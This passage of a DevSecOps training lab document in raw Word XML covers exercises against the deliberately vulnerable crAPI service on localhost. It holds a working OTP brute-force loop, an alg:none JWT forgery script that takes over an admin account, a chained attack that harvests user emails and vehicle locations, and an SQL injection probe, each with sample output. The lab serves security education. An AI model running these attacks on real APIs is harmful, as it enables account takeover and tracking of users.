        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"message": "OTP Sent on the provided email, admin@admin.com", "status": 200}</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 Step 2: brute force v2 endpoint (no rate limiting)</w:t>
        <w:br/>
        <w:t>for otp in $(seq -w 0000 9999); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  result=$(curl -s -X POST http://localhost:8888/identity/api/auth/v2/check-otp \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -d "{\"email\":\"admin@admin.com\",\"otp\":\"$otp\",\"password\":\"NewPassword@1\"}")</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "$result" | grep -q "Invalid OTP" || { echo "HIT: OTP=$otp — $result"; break; }</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HIT: OTP=0009 — {"message":"OTP is valid","status":200}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF0F8"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Why v2 and not v3?  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>v3 endpoint has rate limiting (blocks after ~8 attempts). v2 is a shadow/legacy endpoint that was never decommissioned. This is API9 — Improper Inventory Management. Always try /v1/, /v2/, /v3/ variants of any API endpoint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.6  Exercise 3 — JWT Algorithm:None Attack (API2:2023)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Forge a JWT token for any user without knowing their password or any cryptographic key.</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 Step 1: decode existing token to see structure (middle section = payload)</w:t>
        <w:br/>
        <w:t>echo "eyJzdWIiOiJoYWNrZXI5OUB0ZXN0LmNvbSIsImlhdCI6MTc3Mz..." | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"sub":"hacker99@test.com","iat":1773607237,"exp":1774212037,"role":"user"}</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 Step 2 + 3: forge token for victim and test — all in one block</w:t>
        <w:br/>
        <w:t>TOKEN=$(python3 -c "</w:t>
        <w:br/>
        <w:t>import json, base64</w:t>
        <w:br/>
        <w:t>def b64u(data):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if isinstance(data, str): data = data.encode()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()</w:t>
        <w:br/>
        <w:t>header  = json.dumps({'alg':'none'}, separators=(',',':'))</w:t>
        <w:br/>
        <w:t>payload = json.dumps({'sub':'admin@admin.com','iat':1773607237,'exp':1774212037,'role':'user'}, separators=(',',':'))</w:t>
        <w:br/>
        <w:t>print(f'{b64u(header)}.{b64u(payload)}.')</w:t>
        <w:br/>
        <w:t>")</w:t>
        <w:br/>
        <w:br/>
        <w:t>curl -s http://localhost:8888/identity/api/v2/user/dashboard \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN" | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "id": 8,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "admin",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "email": "admin@admin.com",   ← victim's data returned</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "available_credit": 100.0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "role": "ROLE_USER"</w:t>
        <w:br/>
        <w:t>}</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What just happened:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>You created a JWT with alg:none (no signature) and sub:admin@admin.com. crAPI accepted it and returned admin's dashboard. You did not know the password, did not have any key — just base64url encoding. This is a complete authentication bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>3.5.7  Exercise 4 — Excessive Data Exposure (API3:2023)</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curl -s "http://localhost:8888/community/api/v2/community/posts/recent" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN" | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "posts": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "title": "Title 3",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "author": {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "nickname": "Robot",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "email": "robot001@example.com",      ← not shown in UI</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "vehicleid": "4bae9968-ec7f-4de3-a3a0-ba1b2ab5e5e5"  ← BOLA vector</w:t>
        <w:br/>
        <w:t xml:space="preserve">      }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</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The complete attack chain:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1. GET /community/api/v2/community/posts/recent → harvest email + vehicleid for all posting users</w:t>
              <w:br/>
              <w:t>2. GET /identity/api/v2/vehicle/{vehicleid}/location → GPS coordinates of each user (BOLA)</w:t>
              <w:br/>
              <w:t>3. Forge alg:none JWT with harvested email → full account takeover</w:t>
              <w:br/>
              <w:t>Prerequisite: one free account. Attacker skill: low. Time: under 5 minutes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>Quick Reference — All Key Commands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Module</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Command</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Purpose</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M1</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run -d -p 3000:3000 bkimminich/juice-shop</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Start Juice Shop</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M1</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run -d -p 8080:80 vulnerables/web-dvwa</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Start DVWA</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bandit -r . -f txt</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Python SAST scan</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 xml:space="preserve">semgrep --config=auto . </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Multi-lang SAST scan</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trivy image bkimminich/juice-shop</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Container SCA scan</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trivy fs --scanners vuln .</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Filesystem SCA scan</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osv-scanner -r .</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OSV SCA scan</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run ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t &lt;url&gt;</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ZAP passive scan</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curl -s 'localhost:3000/rest/products/search?q=%27%28'</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SQLi confirm</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compose up -d  (in module-3.5-api-security/)</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Start crAPI</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curl -s http://localhost:8888/identity/api/v2/vehicle/&lt;uuid&gt;/location</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BOLA test</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for otp in $(seq -w 0000 9999); do ... /v2/check-otp ...; done</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OTP brute force</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python3 -c "... alg:none JWT forge ..." → curl dashboard</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JWT bypass</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curl .../community/api/v2/community/posts/recent</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Excessive data exposure</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All</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git add &lt;paths&gt; &amp;&amp; git commit -m 'msg' &amp;&amp; git push origin main</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Push to GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
        </w:rPr>
        <w:t>All Roadblocks &amp; Fixes — Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every error encountered during the lab, with the exact fix:</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Module</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Roadblock</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Fix</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M2</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git add fails — 'pathspec did not match'</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Always cd to repo root ('DSO essentials/') before git add. Read exact paths from git status output.</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M3</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ZAP Docker: '/zap/wrk' not mounted error</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Add -v /tmp/zap-reports:/zap/wrk:rw to the docker run command.</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M3</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ZAP Docker: localhost:3000 unreachable inside container (macOS)</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Use host.docker.internal:3000 instead of localhost:3000 in the -t target URL.</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M3</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ZAP Docker full scan crashes with 'Max retries exceeded' (arm64)</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DomXSS scanner requires headless Firefox which crashes on Apple Silicon. Use ZAP GUI natively instead of Docker.</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M3</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ZAP GUI: 'Failed to start/connect to Firefox'</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brew install --cask firefox. Or switch to Chrome in ZAP → Tools → Options → Selenium.</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M3.5</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BOLA returns 404 Not Found</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Wrong base path. Use /identity/api/v2/vehicle/{uuid}/location not /workshop/api/vehicle/.</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M3.5</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curl returns 401 Invalid Token despite valid token</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Backslash line continuation pasted as single line — Authorization header not sent. Run curl as single line, no backslash.</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M3.5</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Vehicle UUID not found in /vehicle/vehicles response</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Vehicle not added yet. Check Mailhog (http://localhost:8025) for welcome email with VIN + pincode. Add vehicle via UI or API before testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DevSecOps &amp; AI Security Lab  |  Modules 1–3.5  |  Repo: https://github.com/akhil65/DSO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